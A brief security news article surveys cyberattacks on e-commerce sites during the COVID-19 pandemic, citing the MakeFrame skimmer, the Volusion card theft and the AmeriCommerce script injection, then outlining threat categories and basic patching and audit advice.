During the COVID-19 epidemic, the sophistication of cyberattacks has grown multi-folds and e-commerce is one of the worst-hit segments, frequently targeted by innovative cyberattackers.
Recent attacks on e-commerce
The e-commerce industry has testified several cyberattacks in recent months.
- In April 2020, a new Magecart skimmer dubbed MakeFrame had compromised at least 19 different e-commerce websites to steal payment card details of their customers.
- In March 2020, hackers had collected around $1.6 million by selling over 239,000 payment card records on the Dark Web, that were collected from thousands of online shops running a vulnerable version of Volusion e-commerce software.
- In Jan 2020, hackers were seen targeting e-commerce sites powered by AmeriCommerce software by injecting a malicious script with the ‘Add to cart’ button, which could change the value of the form’s action parameter.
Key threats to e-commerce
An e-commerce website may be targeted by cybercriminals in any one of the following ways:
- Malware: Cybercriminals may be using some malware (like Pipka, JS-sniffers, Saefko, etc.) to target e-commerce websites.
- Phishing: Several cybercriminals were seen nursing phishing websites to lure their victims, as was observed in the case of MakeFrame, Amazon Prime, Amazon Alexa, and Google Home.
- Vulnerabilities: The attackers may also attempt to exploit the vulnerabilities in the e-commerce website, as was the case with Amazon Echo Show, Verisign, Blink XT2, Amazon Kindle, etc.
- Data Theft: Attackers also often target the e-commerce websites for the valuable data they hold, like credit or debit card details. Some recent examples of such attacks include PinnacleCart Server-Side Skimmers, Volusion, PlanetDrugsDirect, etc.
How to stay safe
Businesses involved in e-commerce should keep with websites and IT infrastructure up-to-date with the latest patches. Regular audits and scans for the presence of vulnerabilities and rogue code can help fill any loopholes in security.